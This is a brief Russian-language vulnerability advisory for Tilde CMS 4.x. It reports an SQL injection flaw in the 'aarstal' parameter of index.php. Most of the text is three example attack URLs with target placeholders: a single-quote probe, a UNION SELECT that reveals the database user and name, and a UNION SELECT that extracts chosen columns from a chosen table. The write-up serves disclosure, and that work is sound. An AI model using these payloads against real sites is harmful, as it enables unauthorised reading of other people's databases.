Программа: Tilde CMS 4.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «aarstal» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27
http://[target]/[tilde_path]/index.php?id=[yeardetail_id] &mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*
http://[target]/[tilde_path]/index.php?id=[id] &mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name] /**/from/**/[table_name]/*
